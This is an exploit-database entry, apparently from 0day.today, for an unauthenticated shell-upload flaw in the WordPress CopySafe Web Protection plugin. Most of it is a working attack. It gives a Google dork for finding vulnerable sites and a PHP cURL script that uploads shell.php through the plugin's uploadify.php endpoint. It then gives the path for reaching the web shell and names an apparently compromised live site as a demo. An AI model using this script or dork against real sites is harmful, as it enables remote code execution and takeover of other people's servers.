id: 22314
date: 06/03/2014
title: Wordpress Plugin CopySafe Web Protection Shell Upload (0day) Vulnerability
author: Aloulou
cves: 

############################################################################

# Title : Wordpress Plugin CopySafe Web Protection Shell Upload Vulnerability    

# Author : Aloulou                                              

# Date : 01/06/2014                                                     

# Facebook : http://www.facebook.com/Aloulou.TN                                

# Email: aloulou@alquds.com

# Vendor : wordpress.org                                                      

# Google Dork : inurl:wp-content/plugins/wp-copysafe-web  

# Tested on : Linux 
                       


############################################################################

NOTE:showing output "0" means the shell is successfully uplaoded with "0" errors!

Exploit: 

<?php
$uploadfile="shell.php";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/wp-copysafe-web/lib/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('wpcsw_file'=>"@$uploadfile",'error'=>'-1'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

"0"---->successful

ShellAccess:

    http://127.0.0.1/wp-content/plugins/wp-copysafe-web/lib/uploadify/shell.php

Demo:http://extraordinaryviews.de

# Greeting to : Tunisia ,  CyberPink , AnonBoy and All muslims 


############################################################################

#  0day.today [2023-03-22]  #